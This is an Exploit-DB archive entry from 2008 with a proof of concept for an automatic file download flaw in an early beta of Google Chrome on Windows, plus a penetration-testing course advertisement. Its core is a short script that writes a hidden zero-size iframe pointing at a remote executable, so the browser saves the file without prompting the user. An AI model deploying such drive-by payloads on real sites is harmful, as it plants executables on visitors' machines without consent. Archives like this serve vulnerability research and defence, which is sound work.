Google Chrome 0.2.149.27 - Automatic File Download

EDB-ID:

6355


Author:

nerex

Type:

remote


Platform:

Windows

Date:

2008-09-03


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

***************************************************************************
 Author: nerex
 E-mail: nerex[at]live[dot]com

 Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
 downloaded to the user's computer without any user prompt.

 This proof-of-concept was created for educational purposes only.
 Use the code it at your own risk.
 The author will not be responsible for any damages.

 Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

# milw0rm.com [2008-09-03]